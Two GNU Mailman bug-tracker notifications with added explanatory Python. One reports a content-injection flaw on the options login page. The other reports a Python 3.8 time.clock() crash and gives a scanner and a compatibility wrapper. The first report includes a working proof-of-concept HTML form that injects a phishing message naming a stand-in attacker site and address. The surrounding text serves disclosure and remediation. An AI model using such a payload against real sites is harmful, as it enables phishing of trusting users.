*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE-2018-13796 (https://www.cvedetails.com/cve/CVE-2018-13796/)
exists at a different endpoint and parameter. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. The message "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker@badsite.com"
will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions
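The report above is an instance of content injection: a request parameter meant to hold an e-mail address is echoed back verbatim on a trusted domain, so free text placed in it is shown to the user as if the site had written it. The following stand-in code, written for this note and not taken from Mailman, puts the weak pattern beside a hardened one; the function names, the address regex and the page fragment are assumptions made for the illustration.

```python
"""Reflecting a request parameter into a page: the weak pattern and a hardened one.

Stand-in code written for this note; it is not Mailman's implementation. The
function names and the page fragment are assumptions made for the illustration.
"""
import html
import re

# Constructed sample inputs: one legitimate address and the kind of free text
# the report above shows being echoed back by the options login page.
VALID_ADDRESS = "member@example.org"
INJECTED_TEXT = "Your account has been hacked. Kindly go to https://badsite.com"

# A deliberately strict shape check: one local part, one '@', a dotted domain,
# and no whitespace anywhere. Anything that is not an address is not echoed.
_ADDRESS_RE = re.compile(
    r"^[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$"
)


def looks_like_address(value: str) -> bool:
    """Return True only for values shaped like a single e-mail address."""
    return bool(_ADDRESS_RE.match(value))


def render_vulnerable(email: str) -> str:
    """Weak pattern: whatever arrived in the 'email' parameter is placed in the page.

    Escaping keeps the HTML well-formed, but attacker-chosen prose is still shown
    on a trusted domain, which is the content-injection issue the report describes.
    """
    return f"<p>No such member: {html.escape(email)}</p>"


def render_hardened(email: str) -> str:
    """Hardened pattern: validate before reflecting, fall back to a fixed message.

    The value is echoed only when it is shaped like an address, and it is still
    escaped so the page stays well-formed HTML.
    """
    if not looks_like_address(email):
        return "<p>No such member; please check the address you entered.</p>"
    return f"<p>No such member: {html.escape(email)}</p>"


if __name__ == "__main__":
    for value in (VALID_ADDRESS, INJECTED_TEXT):
        print("vulnerable:", render_vulnerable(value))
        print("hardened:  ", render_hardened(value))
```

The point of the hardened version is that escaping alone does not address this class of bug: the injected text is plain prose, not markup, so the fix is to refuse to reflect anything that is not a well-formed address and to use a fixed message instead.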
Public bug reported:
In Ubuntu 20.04 LTS, it seems that the Mailman3 package (3.2.2-1) is
incompatible with Python 3.8, which is used in 20.04.
How to reproduce:
Try to subscribe to a list through the web interface
https://.../mailman3/postorius/lists/.../
It returns an error, and in /var/log/mailman3/mailman.log you will find:
Jun 08 17:35:57 2020 (6830) Uncaught runner exception: module 'time' has no attribute 'clock'
Jun 08 17:35:58 2020 (6830) Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 173, in _one_iteration
self._process_one_file(msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 266, in _process_one_file
keepqueued = self._dispose(mlist, msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/runners/incoming.py", line 79, in _dispose
process(mlist, msg, msgdata, start_chain)
File "/usr/lib/python3/dist-packages/mailman/core/chains.py", line 79, in process
link.function(mlist, msg, msgdata)
File "/usr/lib/python3/dist-packages/mailman/chains/hold.py", line 147, in _process
request_id = hold_message(mlist, msg, msgdata, SEMISPACE.join(reasons))
File "/usr/lib/python3/dist-packages/mailman/app/moderator.py", line 88, in hold_message
request_id = requestsdb.hold_request(
File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
return function(args[0], config.db.store, *args[1:], **kws)
File "/usr/lib/python3/dist-packages/mailman/model/requests.py", line 100, in hold_request
token = getUtility(IPendings).add(pendable, timedelta(days=5000))
File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper
return function(args[0], config.db.store, *args[1:], **kws)
File "/usr/lib/python3/dist-packages/mailman/model/pending.py", line 91, in add
token = token_factory.new()
File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 79, in new
return self._next_unpredictable_id()
File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 155, in _next_unpredictable_id
x = random.random() + right_now % 1.0 + time.clock() % 1.0
AttributeError: module 'time' has no attribute 'clock'
This bug has already been fixed upstream: https://gitlab.com/mailman/mailman/-/commit/ea05bdd0f74ba06d85adad1f7d190a6…
Workaround:
Patch the files under /usr/lib/python3/dist-packages/mailman/ by hand and
restart Mailman.
** Affects: mailman
Importance: Undecided
Status: New
** Affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
** Tags: mailman3
** Also affects: mailman3 (Ubuntu)
Importance: Undecided
Status: New
--
https://bugs.launchpad.net/bugs/1882660
Title:
Mailman and Python 3.8 incompatibility - unable to subscribe a list
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1882660/+subscriptions
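The traceback above ends in `time.clock()`, which was deprecated in Python 3.3 and removed in 3.8, so the runner dies the first time a token has to be generated. Because the suggested workaround is to patch the installed files by hand, an operator first needs to know every place the removed call appears. The following helper, written for this note and not taken from Mailman's upstream fix or the Ubuntu package, does two things: it walks a module's AST to list the lines that actually call `time.clock()` (ignoring mentions in comments and strings), and it provides a version-independent wrapper around `time.perf_counter()` of the kind such a patch would drop in. The sample source it scans is constructed for the example.

```python
"""Finding and bridging the removed time.clock() before a Python 3.8 upgrade.

Helper code written for this note, not Mailman's own fix or the Ubuntu package.
The scanner, the wrapper and the sample source are assumptions made for the
illustration.
"""
import ast
import sys
import time
from typing import List


def clock_fraction() -> float:
    """Sub-second part of a process clock, usable on Python 3.3 through 3.8 and later.

    time.clock() was deprecated in 3.3 and removed in 3.8; time.perf_counter()
    exists since 3.3 and is the documented replacement for timing purposes.
    """
    counter = getattr(time, "perf_counter", None) or time.clock
    return counter() % 1.0


def find_time_clock_calls(source: str) -> List[int]:
    """Return the line numbers where `time.clock(...)` is called in `source`.

    An AST walk is used rather than grep so that comments and strings that
    merely mention time.clock are not reported.
    """
    tree = ast.parse(source)
    hits = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr == "clock"
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "time"):
            hits.append(node.lineno)
    return sorted(hits)


# Constructed sample: the shape of the line quoted in the traceback above,
# plus a comment and a replacement call that must not be flagged.
SAMPLE_SOURCE = """\
import random, time

def _next_unpredictable_id(right_now):
    # time.clock() is mentioned here only in a comment
    x = random.random() + right_now % 1.0 + time.clock() % 1.0
    y = time.perf_counter() % 1.0
    return x, y
"""


if __name__ == "__main__":
    print("python", sys.version_info[:2], "clock_fraction ->", clock_fraction())
    # Pass module paths on the command line to scan an installed tree.
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for lineno in find_time_clock_calls(fh.read()):
                print(f"{path}:{lineno}: time.clock() call")
    if not sys.argv[1:]:
        print("sample hits:", find_time_clock_calls(SAMPLE_SOURCE))
```

Run with the paths of the `.py` files under the installed package to get a line-numbered list of what has to change; only the flagged calls need editing, since `time.perf_counter()` and the comment in the sample are left alone.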